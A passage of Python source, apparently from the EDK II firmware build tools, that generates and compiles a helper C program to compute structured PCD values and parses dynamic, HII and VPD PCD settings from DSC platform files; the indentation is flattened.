CApp += "static %s %s_%s_DEFAULT_STANDARD_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Demesion,realvalue)
return CApp
def SkuOverrideValuesEmpty(self,OverrideValues):
if not OverrideValues:
return True
for key in OverrideValues:
if OverrideValues[key]:
return False
return True
def ParseCCFlags(self, ccflag):
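# Collects the preprocessor define/undefine options from a CC flags string, keeping both the
# split form ("/D NAME", "-U NAME") and the joined form ("-DNAME", "/UNAME") while dropping all
# other flags. Illustrative example: "/D FOO=1 -DBAR /O2" would yield {"/D FOO=1", "-DBAR"}.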
ccflags = set()
ccflaglist = ccflag.split(" ")
i = 0
while i < len(ccflaglist):
item = ccflaglist[i].strip()
if item in (r"/D", r"/U","-D","-U"):
ccflags.add(" ".join((ccflaglist[i],ccflaglist[i+1])))
i = i+1
elif item.startswith((r"/D", r"/U","-D","-U")):
ccflags.add(item)
i +=1
return ccflags
def GenerateByteArrayValue (self, StructuredPcds):
#
# Generate/Compile/Run C application to determine if there are any flexible array members
#
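# Overview: writes <PcdValueInitName>.c and a Makefile into self.OutputPath, builds them with
# nmake (Windows) or make (elsewhere), runs the resulting tool as
# "<tool> -i Input.txt -o Output.txt", and parses Output.txt into the returned list of
# (SkuName, DefaultStoreName, TokenSpaceGuidCName, TokenCName, Value) tuples.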
if not StructuredPcds:
return
InitByteValue = ""
CApp = PcdMainCHeader
IncludeFiles = set()
for PcdName in StructuredPcds:
Pcd = StructuredPcds[PcdName]
for IncludeFile in Pcd.StructuredPcdIncludeFile:
if IncludeFile not in IncludeFiles:
IncludeFiles.add(IncludeFile)
CApp = CApp + '#include <%s>\n' % (IncludeFile)
CApp = CApp + '\n'
for Pcd in StructuredPcds.values():
CApp = CApp + self.GenerateArrayAssignment(Pcd)
for PcdName in StructuredPcds:
Pcd = StructuredPcds[PcdName]
CApp = CApp + self.GenerateSizeFunction(Pcd)
CApp = CApp + self.GenerateDefaultValueAssignFunction(Pcd)
CApp = CApp + self.GenerateFdfValue(Pcd)
CApp = CApp + self.GenerateCommandLineValue(Pcd)
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
CApp = CApp + self.GenerateInitValueFunction(Pcd, self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in Pcd.SkuOverrideValues:
continue
for DefaultStoreName in Pcd.SkuOverrideValues[SkuName]:
CApp = CApp + self.GenerateInitValueFunction(Pcd, SkuName, DefaultStoreName)
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
InitByteValue, CApp = self.GenerateInitializeFunc(self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT, Pcd, InitByteValue, CApp)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in Pcd.SkuOverrideValues:
continue
for DefaultStoreName in Pcd.DefaultStoreName:
Pcd = StructuredPcds[PcdName]
InitByteValue, CApp = self.GenerateInitializeFunc(SkuName, DefaultStoreName, Pcd, InitByteValue, CApp)
CApp = CApp + 'VOID\n'
CApp = CApp + 'PcdEntryPoint(\n'
CApp = CApp + ' VOID\n'
CApp = CApp + ' )\n'
CApp = CApp + '{\n'
for Pcd in StructuredPcds.values():
if self.SkuOverrideValuesEmpty(Pcd.SkuOverrideValues) or Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD], self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
CApp = CApp + ' Initialize_%s_%s_%s_%s();\n' % (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
for SkuName in self.SkuIdMgr.SkuOverrideOrder():
if SkuName not in self.SkuIdMgr.AvailableSkuIdSet:
continue
for DefaultStoreName in Pcd.SkuOverrideValues[SkuName]:
CApp = CApp + ' Initialize_%s_%s_%s_%s();\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + '}\n'
CApp = CApp + PcdMainCEntry + '\n'
if not os.path.exists(self.OutputPath):
os.makedirs(self.OutputPath)
CAppBaseFileName = os.path.join(self.OutputPath, PcdValueInitName)
SaveFileOnChange(CAppBaseFileName + '.c', CApp, False)
MakeApp = PcdMakefileHeader
if sys.platform == "win32":
MakeApp = MakeApp + 'APPFILE = %s\%s.exe\n' % (self.OutputPath, PcdValueInitName) + 'APPNAME = %s\n' % (PcdValueInitName) + 'OBJECTS = %s\%s.obj\n' % (self.OutputPath, PcdValueInitName) + 'INC = '
else:
MakeApp = MakeApp + PcdGccMakefile
MakeApp = MakeApp + 'APPFILE = %s/%s\n' % (self.OutputPath, PcdValueInitName) + 'APPNAME = %s\n' % (PcdValueInitName) + 'OBJECTS = %s/%s.o\n' % (self.OutputPath, PcdValueInitName) + \
'include $(MAKEROOT)/Makefiles/app.makefile\n' + 'INCLUDE +='
IncSearchList = []
PlatformInc = OrderedDict()
for Cache in self._Bdb._CACHE_.values():
if Cache.MetaFile.Ext.lower() != '.dec':
continue
if Cache.Includes:
if str(Cache.MetaFile.Path) not in PlatformInc:
PlatformInc[str(Cache.MetaFile.Path)] = []
PlatformInc[str(Cache.MetaFile.Path)].append (os.path.dirname(Cache.MetaFile.Path))
PlatformInc[str(Cache.MetaFile.Path)].extend (Cache.CommonIncludes)
PcdDependDEC = []
for Pcd in StructuredPcds.values():
for PackageDec in Pcd.PackageDecs:
Package = os.path.normpath(mws.join(GlobalData.gWorkspace, PackageDec))
if not os.path.exists(Package):
EdkLogger.error('Build', RESOURCE_NOT_AVAILABLE, "The dependent Package %s of PCD %s.%s does not exist." % (PackageDec, Pcd.TokenSpaceGuidCName, Pcd.TokenCName))
if Package not in PcdDependDEC:
PcdDependDEC.append(Package)
if PlatformInc and PcdDependDEC:
for pkg in PcdDependDEC:
if pkg in PlatformInc:
for inc in PlatformInc[pkg]:
MakeApp += '-I' + str(inc) + ' '
IncSearchList.append(inc)
MakeApp = MakeApp + '\n'
CC_FLAGS = LinuxCFLAGS
if sys.platform == "win32":
CC_FLAGS = WindowsCFLAGS
BuildOptions = OrderedDict()
for Options in self.BuildOptions:
if Options[2] != EDKII_NAME:
continue
Family = Options[0]
if Family and Family != self.ToolChainFamily:
continue
Target, Tag, Arch, Tool, Attr = Options[1].split("_")
if Tool != 'CC':
continue
if Attr != "FLAGS":
continue
if Target == TAB_STAR or Target == self._Target:
if Tag == TAB_STAR or Tag == self._Toolchain:
if 'COMMON' not in BuildOptions:
BuildOptions['COMMON'] = set()
if Arch == TAB_STAR:
BuildOptions['COMMON']|= self.ParseCCFlags(self.BuildOptions[Options])
if Arch in self.SupArchList:
if Arch not in BuildOptions:
BuildOptions[Arch] = set()
BuildOptions[Arch] |= self.ParseCCFlags(self.BuildOptions[Options])
if BuildOptions:
ArchBuildOptions = {arch:flags for arch,flags in BuildOptions.items() if arch != 'COMMON'}
if len(ArchBuildOptions.keys()) == 1:
BuildOptions['COMMON'] |= (list(ArchBuildOptions.values())[0])
elif len(ArchBuildOptions.keys()) > 1:
CommonBuildOptions = reduce(lambda x,y: x&y, ArchBuildOptions.values())
BuildOptions['COMMON'] |= CommonBuildOptions
ValueList = [item for item in BuildOptions['COMMON'] if item.startswith((r"/U","-U"))]
ValueList.extend([item for item in BuildOptions['COMMON'] if item.startswith((r"/D", "-D"))])
CC_FLAGS += " ".join(ValueList)
MakeApp += CC_FLAGS
if sys.platform == "win32":
MakeApp = MakeApp + PcdMakefileEnd
MakeApp = MakeApp + AppTarget % ("""\tcopy $(APPLICATION) $(APPFILE) /y """)
else:
MakeApp = MakeApp + AppTarget % ("""\tcp $(APPLICATION) $(APPFILE) """)
MakeApp = MakeApp + '\n'
IncludeFileFullPaths = []
for includefile in IncludeFiles:
for includepath in IncSearchList:
includefullpath = os.path.join(str(includepath), includefile)
if os.path.exists(includefullpath):
IncludeFileFullPaths.append(os.path.normpath(includefullpath))
break
SearchPathList = []
SearchPathList.append(os.path.normpath(mws.join(GlobalData.gWorkspace, "BaseTools/Source/C/Include")))
SearchPathList.append(os.path.normpath(mws.join(GlobalData.gWorkspace, "BaseTools/Source/C/Common")))
SearchPathList.extend(str(item) for item in IncSearchList)
IncFileList = GetDependencyList(IncludeFileFullPaths, SearchPathList)
for include_file in IncFileList:
MakeApp += "$(OBJECTS) : %s\n" % include_file
MakeFileName = os.path.join(self.OutputPath, 'Makefile')
MakeApp += "$(OBJECTS) : %s\n" % MakeFileName
SaveFileOnChange(MakeFileName, MakeApp, False)
InputValueFile = os.path.join(self.OutputPath, 'Input.txt')
OutputValueFile = os.path.join(self.OutputPath, 'Output.txt')
SaveFileOnChange(InputValueFile, InitByteValue, False)
Dest_PcdValueInitExe = PcdValueInitName
if sys.platform != "win32":
Dest_PcdValueInitExe = os.path.join(self.OutputPath, PcdValueInitName)
else:
Dest_PcdValueInitExe = os.path.join(self.OutputPath, PcdValueInitName) +".exe"
Messages = ''
if sys.platform == "win32":
MakeCommand = 'nmake -f %s' % (MakeFileName)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (MakeCommand)
Messages = StdOut
else:
MakeCommand = 'make -f %s' % (MakeFileName)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (MakeCommand)
Messages = StdErr
Messages = Messages.split('\n')
MessageGroup = []
if returncode != 0:
CAppBaseFileName = os.path.join(self.OutputPath, PcdValueInitName)
File = open (CAppBaseFileName + '.c', 'r')
FileData = File.readlines()
File.close()
for Message in Messages:
if " error" in Message or "warning" in Message:
FileInfo = Message.strip().split('(')
if len (FileInfo) > 1:
FileName = FileInfo [0]
FileLine = FileInfo [1].split (')')[0]
else:
FileInfo = Message.strip().split(':')
if len(FileInfo) < 2:
continue
FileName = FileInfo [0]
FileLine = FileInfo [1]
if FileLine.isdigit():
error_line = FileData[int (FileLine) - 1]
if r"//" in error_line:
c_line, dsc_line = error_line.split(r"//")
else:
dsc_line = error_line
message_itmes = Message.split(":")
Index = 0
if "PcdValueInit.c" not in Message:
if not MessageGroup:
MessageGroup.append(Message)
break
else:
for item in message_itmes:
if "PcdValueInit.c" in item:
Index = message_itmes.index(item)
message_itmes[Index] = dsc_line.strip()
break
MessageGroup.append(":".join(message_itmes[Index:]).strip())
continue
else:
MessageGroup.append(Message)
if MessageGroup:
EdkLogger.error("build", PCD_STRUCTURE_PCD_ERROR, "\n".join(MessageGroup) )
else:
EdkLogger.error('Build', COMMAND_FAILURE, 'Can not execute command: %s' % MakeCommand)
if DscBuildData.NeedUpdateOutput(OutputValueFile, Dest_PcdValueInitExe, InputValueFile):
Command = Dest_PcdValueInitExe + ' -i %s -o %s' % (InputValueFile, OutputValueFile)
returncode, StdOut, StdErr = DscBuildData.ExecuteCommand (Command)
if returncode != 0:
EdkLogger.warn('Build', COMMAND_FAILURE, 'Can not collect output from command: %s' % Command)
File = open (OutputValueFile, 'r')
FileBuffer = File.readlines()
File.close()
StructurePcdSet = []
for Pcd in FileBuffer:
PcdValue = Pcd.split ('|')
PcdInfo = PcdValue[0].split ('.')
StructurePcdSet.append((PcdInfo[0], PcdInfo[1], PcdInfo[2], PcdInfo[3], PcdValue[2].strip()))
return StructurePcdSet
@staticmethod
def NeedUpdateOutput(OutputFile, ValueCFile, StructureInput):
if not os.path.exists(OutputFile):
return True
if os.stat(OutputFile).st_mtime <= os.stat(ValueCFile).st_mtime:
return True
if os.stat(OutputFile).st_mtime <= os.stat(StructureInput).st_mtime:
return True
return False
## Retrieve dynamic PCD settings
#
# @param Type PCD type
#
# @retval a dict object containing the settings of the given PCD type
#
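# The returned dict is keyed by (PcdCName, TokenSpaceGuid) tuples and maps each key to a
# PcdClassObject whose SkuInfoList holds one SkuInfoClass entry per SKU defined in the DSC.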
def _GetDynamicPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special kind of dict, used for selecting the correct
# PCD settings for a certain ARCH and SKU
#
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
AvailableSkuIdSet = copy.copy(self.SkuIds)
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid]
if Setting is None:
continue
PcdValue, DatumType, MaxDatumSize = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], '', '', '', '', '', PcdValue)
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
pcdObject.SkuInfoList[SkuName] = SkuInfo
if MaxDatumSize.strip():
CurrentMaxSize = int(MaxDatumSize.strip(), 0)
else:
CurrentMaxSize = 0
if pcdObject.MaxDatumSize:
PcdMaxSize = int(pcdObject.MaxDatumSize, 0)
else:
PcdMaxSize = 0
if CurrentMaxSize > PcdMaxSize:
pcdObject.MaxDatumSize = str(CurrentMaxSize)
else:
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
DatumType,
PcdValue,
'',
MaxDatumSize,
OrderedDict({SkuName : SkuInfo}),
False,
None,
IsDsc=True)
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = PcdValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if not sku.DefaultValue:
sku.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', '', '', '', '', '', valuefromDec)
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
def FilterSkuSettings(self, PcdObj):
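# For SINGLE SKU usage, the system SKU's settings are re-labelled as DEFAULT and all other SKU
# entries are dropped; for DEFAULT usage, only the DEFAULT entry is kept.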
if self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.SINGLE:
if TAB_DEFAULT in PcdObj.SkuInfoList and self.SkuIdMgr.SystemSkuId not in PcdObj.SkuInfoList:
PcdObj.SkuInfoList[self.SkuIdMgr.SystemSkuId] = PcdObj.SkuInfoList[TAB_DEFAULT]
PcdObj.SkuInfoList = {TAB_DEFAULT:PcdObj.SkuInfoList[self.SkuIdMgr.SystemSkuId]}
PcdObj.SkuInfoList[TAB_DEFAULT].SkuIdName = TAB_DEFAULT
PcdObj.SkuInfoList[TAB_DEFAULT].SkuId = '0'
elif self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.DEFAULT:
PcdObj.SkuInfoList = {TAB_DEFAULT:PcdObj.SkuInfoList[TAB_DEFAULT]}
return PcdObj
@staticmethod
def CompareVarAttr(Attr1, Attr2):
if not Attr1 or not Attr2: # for empty string
return True
Attr1s = [attr.strip() for attr in Attr1.split(",")]
Attr1Set = set(Attr1s)
Attr2s = [attr.strip() for attr in Attr2.split(",")]
Attr2Set = set(Attr2s)
if Attr2Set == Attr1Set:
return True
else:
return False
def CompletePcdValues(self, PcdSet):
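# For dynamic and dynamic-ex PCDs, fills in the SKU and default-store entries that the DSC did
# not set: missing default stores are copied from the store returned by DefaultStoreObj.GetMin(),
# and missing SKUs are deep-copied from the SKU found via SkuIdMgr.GetNextSkuId(); all other PCD
# types are passed through unchanged.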
Pcds = OrderedDict()
DefaultStoreObj = DefaultStore(self._GetDefaultStores())
SkuIds = {skuname:skuid for skuname, skuid in self.SkuIdMgr.AvailableSkuIdSet.items() if skuname != TAB_COMMON}
DefaultStores = set(storename for pcdobj in PcdSet.values() for skuobj in pcdobj.SkuInfoList.values() for storename in skuobj.DefaultStoreDict)
for PcdCName, TokenSpaceGuid in PcdSet:
PcdObj = PcdSet[(PcdCName, TokenSpaceGuid)]
if PcdObj.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_VPD],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_VPD]]:
Pcds[PcdCName, TokenSpaceGuid]= PcdObj
continue
PcdType = PcdObj.Type
if PcdType in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
for skuid in PcdObj.SkuInfoList:
skuobj = PcdObj.SkuInfoList[skuid]
mindefaultstorename = DefaultStoreObj.GetMin(set(defaultstorename for defaultstorename in skuobj.DefaultStoreDict))
for defaultstorename in DefaultStores:
if defaultstorename not in skuobj.DefaultStoreDict:
skuobj.DefaultStoreDict[defaultstorename] = skuobj.DefaultStoreDict[mindefaultstorename]
skuobj.HiiDefaultValue = skuobj.DefaultStoreDict[mindefaultstorename]
for skuname, skuid in SkuIds.items():
if skuname not in PcdObj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(skuname)
while nextskuid not in PcdObj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
PcdObj.SkuInfoList[skuname] = copy.deepcopy(PcdObj.SkuInfoList[nextskuid])
PcdObj.SkuInfoList[skuname].SkuId = skuid
PcdObj.SkuInfoList[skuname].SkuIdName = skuname
if PcdType in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
PcdObj.DefaultValue = list(PcdObj.SkuInfoList.values())[0].HiiDefaultValue if self.SkuIdMgr.SkuUsageType == self.SkuIdMgr.SINGLE else PcdObj.SkuInfoList[TAB_DEFAULT].HiiDefaultValue
Pcds[PcdCName, TokenSpaceGuid]= PcdObj
return Pcds
## Retrieve dynamic HII PCD settings
#
# @param Type PCD type
#
# @retval a dict object containing the settings of the given PCD type
#
def _GetDynamicHiiPcd(self, Type):
VariableAttrs = {}
Pcds = OrderedDict()
UserDefinedDefaultStores = []
#
# tdict is a special kind of dict, used for selecting the correct
# PCD settings for a certain ARCH and SKU
#
PcdDict = tdict(True, 5)
PcdList = []
RecordList = self._RawData[Type, self._Arch]
# Find out all possible PCD candidates for self._Arch
AvailableSkuIdSet = copy.copy(self.SkuIds)
DefaultStoresDefine = self._GetDefaultStores()
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, DefaultStore, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
DefaultStore = DefaultStore.upper()
if DefaultStore == TAB_COMMON:
DefaultStore = TAB_DEFAULT_STORES_DEFAULT
else:
# The end user defines [DefaultStores] and [SKUID_IDENTIFIER.Manufacturing] in the DSC
UserDefinedDefaultStores.append((PcdCName, TokenSpaceGuid))
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if DefaultStore not in DefaultStoresDefine:
EdkLogger.error('build', PARAMETER_INVALID, 'DefaultStores %s is not defined in [DefaultStores] section' % DefaultStore,
File=self.MetaFile, Line=Dummy5)
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid, DefaultStore] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for index,(PcdCName, TokenSpaceGuid, SkuName, DefaultStore, Dummy4) in enumerate(PcdList):
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid, DefaultStore]
if Setting is None:
continue
VariableName, VariableGuid, VariableOffset, DefaultValue, VarAttribute = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
rt, Msg = VariableAttributes.ValidateVarAttributes(VarAttribute)
if not rt:
EdkLogger.error("build", PCD_VARIABLE_ATTRIBUTES_ERROR, "Variable attributes settings for %s is incorrect.\n %s" % (".".join((TokenSpaceGuid, PcdCName)), Msg),
ExtraData="[%s]" % VarAttribute)
ExceedMax = False
FormatCorrect = True
if VariableOffset.isdigit():
if int(VariableOffset, 10) > 0xFFFF:
ExceedMax = True
elif variablePattern.match(VariableOffset):
if int(VariableOffset, 16) > 0xFFFF:
ExceedMax = True
# For Offset written in "A.B"
elif VariableOffset.find('.') > -1:
VariableOffsetList = VariableOffset.split(".")
if not (len(VariableOffsetList) == 2
and IsValidWord(VariableOffsetList[0])
and IsValidWord(VariableOffsetList[1])):
FormatCorrect = False
else:
FormatCorrect = False
if not FormatCorrect:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid syntax or format of the variable offset value is incorrect for %s." % ".".join((TokenSpaceGuid, PcdCName)))
if ExceedMax:
EdkLogger.error('Build', OPTION_VALUE_INVALID, "The variable offset value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)))
if (VariableName, VariableGuid) not in VariableAttrs:
VariableAttrs[(VariableName, VariableGuid)] = VarAttribute
else:
if not DscBuildData.CompareVarAttr(VariableAttrs[(VariableName, VariableGuid)], VarAttribute):
EdkLogger.error('Build', PCD_VARIABLE_ATTRIBUTES_CONFLICT_ERROR, "The variable %s.%s for DynamicHii PCDs has conflicting attributes [%s] and [%s] " % (VariableGuid, VariableName, VarAttribute, VariableAttrs[(VariableName, VariableGuid)]))
pcdDecObject = self._DecPcds[PcdCName, TokenSpaceGuid]
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
if SkuName in pcdObject.SkuInfoList:
Skuitem = pcdObject.SkuInfoList[SkuName]
Skuitem.DefaultStoreDict.update({DefaultStore:DefaultValue})
else:
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], VariableName, VariableGuid, VariableOffset, DefaultValue, VariableAttribute=VarAttribute, DefaultStore={DefaultStore:DefaultValue})
pcdObject.SkuInfoList[SkuName] = SkuInfo
else:
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], VariableName, VariableGuid, VariableOffset, DefaultValue, VariableAttribute=VarAttribute, DefaultStore={DefaultStore:DefaultValue})
PcdClassObj = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
'',
DefaultValue,
'',
'',
OrderedDict({SkuName : SkuInfo}),
False,
None,
pcdDecObject.validateranges,
pcdDecObject.validlists,
pcdDecObject.expressions,
IsDsc=True)
if (PcdCName, TokenSpaceGuid) in UserDefinedDefaultStores:
PcdClassObj.UserDefinedDefaultStoresFlag = True
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObj
Pcds[PcdCName, TokenSpaceGuid].CustomAttribute['DscPosition'] = index
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][DefaultStore] = DefaultValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][DefaultStore] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
pcd.DatumType = pcdDecObject.DatumType
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if (sku.HiiDefaultValue == "" or sku.HiiDefaultValue is None):
sku.HiiDefaultValue = pcdDecObject.DefaultValue
for default_store in sku.DefaultStoreDict:
sku.DefaultStoreDict[default_store]=pcdDecObject.DefaultValue
pcd.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
SkuInfoObj = list(pcd.SkuInfoList.values())[0]
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', SkuInfoObj.VariableName, SkuInfoObj.VariableGuid, SkuInfoObj.VariableOffset, valuefromDec, VariableAttribute=SkuInfoObj.VariableAttribute, DefaultStore={DefaultStore:valuefromDec})
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
if pcd.MaxDatumSize.strip():
MaxSize = int(pcd.MaxDatumSize, 0)
else:
MaxSize = 0
if pcd.DatumType not in TAB_PCD_NUMERIC_TYPES:
for (_, skuobj) in pcd.SkuInfoList.items():
datalen = 0
skuobj.HiiDefaultValue = StringToArray(skuobj.HiiDefaultValue)
datalen = len(skuobj.HiiDefaultValue.split(","))
if datalen > MaxSize:
MaxSize = datalen
for defaultst in skuobj.DefaultStoreDict:
skuobj.DefaultStoreDict[defaultst] = StringToArray(skuobj.DefaultStoreDict[defaultst])
pcd.DefaultValue = StringToArray(pcd.DefaultValue)
pcd.MaxDatumSize = str(MaxSize)
rt, invalidhii = DscBuildData.CheckVariableNameAssignment(Pcds)
if not rt:
invalidpcd = ",".join(invalidhii)
EdkLogger.error('build', PCD_VARIABLE_INFO_ERROR, Message='The same HII PCD must map to the same EFI variable for all SKUs', File=self.MetaFile, ExtraData=invalidpcd)
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
@staticmethod
def CheckVariableNameAssignment(Pcds):
invalidhii = []
for pcdname in Pcds:
pcd = Pcds[pcdname]
varnameset = set(sku.VariableName for (skuid, sku) in pcd.SkuInfoList.items())
if len(varnameset) > 1:
invalidhii.append(".".join((pcdname[1], pcdname[0])))
if len(invalidhii):
return False, invalidhii
else:
return True, []
## Retrieve dynamic VPD PCD settings
#
# @param Type PCD type
#
# @retval a dict object containing the settings of the given PCD type
#
def _GetDynamicVpdPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special kind of dict, used for selecting the correct
# PCD settings for a certain ARCH and SKU
#
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
AvailableSkuIdSet = copy.copy(self.SkuIds)
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
